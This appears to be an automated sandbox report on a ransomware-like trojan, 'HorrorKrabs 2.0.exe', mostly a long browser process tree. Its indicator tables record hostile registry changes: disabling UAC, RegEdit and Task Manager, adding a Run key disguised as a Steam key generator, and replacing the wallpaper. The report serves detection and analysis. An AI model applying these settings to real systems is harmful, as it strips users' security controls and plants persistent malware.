hxxp://Google[.]com

Analysis

max time kernel
444s
max time network
449s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
01-05-2024 17:52

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

http://Google.com

Score

10^/10

evasion persistence ransomware trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Disables RegEdit via registry modification 2 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "0"	HorrorKrabs 2.0.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
evasion

Executes dropped EXE 1 IoCs

pid	Process
2124	HorrorKrabs 2.0.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\FreeSteamKeysGenerator2024 = "C:\\windows\\update64\\krab.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
112	raw.githubusercontent.com
113	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "c:\\windows\\update64\\bg.bmp"	reg.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\windows\update64\krab.exe	cmd.exe
File created	C:\Windows\update64\bg.bmp	cmd.exe
File opened for modification	C:\Windows\update64\bg.bmp	cmd.exe
File created	C:\windows\update64\krab.exe	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 17 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "1"	LogonUI.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133590595759341258"	chrome.exe

Modifies registry class 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings	OpenWith.exe

Modifies registry key 1 TTPs 5 IoCs

Modify Registry

T1112

pid	Process
700	reg.exe
368	reg.exe
4752	reg.exe
2792	reg.exe
3508	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3052	chrome.exe
3052	chrome.exe
4688	chrome.exe
4688	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3480	OpenWith.exe
1496	OpenWith.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe
Token: SeShutdownPrivilege	3052	chrome.exe
Token: SeCreatePagefilePrivilege	3052	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe
3052	chrome.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
792	OpenWith.exe
3480	OpenWith.exe
1496	OpenWith.exe
1536	OpenWith.exe
2012	OpenWith.exe
2780	OpenWith.exe
2256	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3052 wrote to memory of 2920	3052	chrome.exe	72
PID 3052 wrote to memory of 2920	3052	chrome.exe	72
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 3468	3052	chrome.exe	74
PID 3052 wrote to memory of 4320	3052	chrome.exe	75
PID 3052 wrote to memory of 4320	3052	chrome.exe	75
PID 3052 wrote to memory of 2132	3052	chrome.exe	76
PID 3052 wrote to memory of 2132	3052	chrome.exe	76
PID 3052 wrote to memory of 2132	3052	chrome.exe	76
PID 3052 wrote to memory of 2132	3052	chrome.exe	76
PID 3052 wrote to memory of 2132	3052	chrome.exe	76
PID 3052 wrote to memory of 2132	3052	chrome.exe	76
PID 3052 wrote to memory of 2132	3052	chrome.exe	76
PID 3052 wrote to memory of 2132	3052	chrome.exe	76
PID 3052 wrote to memory of 2132	3052	chrome.exe	76
PID 3052 wrote to memory of 2132	3052	chrome.exe	76
PID 3052 wrote to memory of 2132	3052	chrome.exe	76
PID 3052 wrote to memory of 2132	3052	chrome.exe	76
PID 3052 wrote to memory of 2132	3052	chrome.exe	76
PID 3052 wrote to memory of 2132	3052	chrome.exe	76
PID 3052 wrote to memory of 2132	3052	chrome.exe	76
PID 3052 wrote to memory of 2132	3052	chrome.exe	76
PID 3052 wrote to memory of 2132	3052	chrome.exe	76
PID 3052 wrote to memory of 2132	3052	chrome.exe	76
PID 3052 wrote to memory of 2132	3052	chrome.exe	76
PID 3052 wrote to memory of 2132	3052	chrome.exe	76
PID 3052 wrote to memory of 2132	3052	chrome.exe	76
PID 3052 wrote to memory of 2132	3052	chrome.exe	76

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	HorrorKrabs 2.0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\HideFastUserSwitching = "1"	HorrorKrabs 2.0.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://Google.com
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7fffcd579758,0x7fffcd579768,0x7fffcd579778
  2⤵
  PID:2920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1660 --field-trial-handle=1752,i,8747770321785426448,6681647103215382222,131072 /prefetch:2
  2⤵
  PID:3468
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1916 --field-trial-handle=1752,i,8747770321785426448,6681647103215382222,131072 /prefetch:8
  2⤵
  PID:4320
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2072 --field-trial-handle=1752,i,8747770321785426448,6681647103215382222,131072 /prefetch:8
  2⤵
  PID:2132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2648 --field-trial-handle=1752,i,8747770321785426448,6681647103215382222,131072 /prefetch:1
  2⤵
  PID:1884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2668 --field-trial-handle=1752,i,8747770321785426448,6681647103215382222,131072 /prefetch:1
  2⤵
  PID:2120
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4284 --field-trial-handle=1752,i,8747770321785426448,6681647103215382222,131072 /prefetch:1
  2⤵
  PID:4656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4516 --field-trial-handle=1752,i,8747770321785426448,6681647103215382222,131072 /prefetch:8
  2⤵
  PID:3020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4588 --field-trial-handle=1752,i,8747770321785426448,6681647103215382222,131072 /prefetch:8
  2⤵
  PID:1664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4776 --field-trial-handle=1752,i,8747770321785426448,6681647103215382222,131072 /prefetch:1
  2⤵
  PID:2404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4616 --field-trial-handle=1752,i,8747770321785426448,6681647103215382222,131072 /prefetch:1
  2⤵
  PID:4248
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4880 --field-trial-handle=1752,i,8747770321785426448,6681647103215382222,131072 /prefetch:8
  2⤵
  PID:4608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5644 --field-trial-handle=1752,i,8747770321785426448,6681647103215382222,131072 /prefetch:1
  2⤵
  PID:1464
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3044 --field-trial-handle=1752,i,8747770321785426448,6681647103215382222,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5804 --field-trial-handle=1752,i,8747770321785426448,6681647103215382222,131072 /prefetch:8
  2⤵
  PID:2656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 --field-trial-handle=1752,i,8747770321785426448,6681647103215382222,131072 /prefetch:8
  2⤵
  PID:388
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5940 --field-trial-handle=1752,i,8747770321785426448,6681647103215382222,131072 /prefetch:8
  2⤵
  PID:3536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5872 --field-trial-handle=1752,i,8747770321785426448,6681647103215382222,131072 /prefetch:8
  2⤵
  PID:4000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5044 --field-trial-handle=1752,i,8747770321785426448,6681647103215382222,131072 /prefetch:8
  2⤵
  PID:1924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4400 --field-trial-handle=1752,i,8747770321785426448,6681647103215382222,131072 /prefetch:8
  2⤵
  PID:2744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5520 --field-trial-handle=1752,i,8747770321785426448,6681647103215382222,131072 /prefetch:8
  2⤵
  PID:4812
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6140 --field-trial-handle=1752,i,8747770321785426448,6681647103215382222,131072 /prefetch:8
  2⤵
  PID:3592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5928 --field-trial-handle=1752,i,8747770321785426448,6681647103215382222,131072 /prefetch:8
  2⤵
  PID:3736
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6052 --field-trial-handle=1752,i,8747770321785426448,6681647103215382222,131072 /prefetch:8
  2⤵
  PID:2328
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5484 --field-trial-handle=1752,i,8747770321785426448,6681647103215382222,131072 /prefetch:8
  2⤵
  PID:1556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6080 --field-trial-handle=1752,i,8747770321785426448,6681647103215382222,131072 /prefetch:8
  2⤵
  PID:3428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5844 --field-trial-handle=1752,i,8747770321785426448,6681647103215382222,131072 /prefetch:8
  2⤵
  PID:3148

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4360

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:792

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3480

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3988

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1496

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1536

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap18249:90:7zEvent28402
1⤵
PID:600

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2012

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
